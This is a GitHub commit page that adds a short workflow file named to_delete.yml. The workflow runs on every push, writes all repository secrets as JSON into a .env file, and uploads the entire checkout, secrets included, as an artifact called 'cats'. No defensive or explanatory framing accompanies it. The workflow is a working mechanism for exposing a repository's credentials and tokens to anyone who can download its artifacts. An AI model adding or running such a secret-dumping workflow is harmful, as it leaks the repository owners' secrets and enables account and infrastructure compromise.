Skip to content

Commit

Permalink
try this
Browse files Browse the repository at this point in the history
  • Loading branch information
mtcarlone authored Jan 13, 2025
1 parent 857193f commit 2721272
Showing 1 changed file with 17 additions and 0 deletions.
17 changes: 17 additions & 0 deletions .github/workflows/to_delete.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
on: push

jobs:
create-envfile:
runs-on: ubuntu-latest
steps:
- name: Make File
uses: SpicyPizza/[email protected]
with:
envkey_SECRETS: ${{ toJSON(secrets) }}
file_name: .env
fail_on_empty: false
- name: Upload
uses: actions/upload-artifact@v4
with:
name: cats
path: .

0 comments on commit 2721272

Please sign in to comment.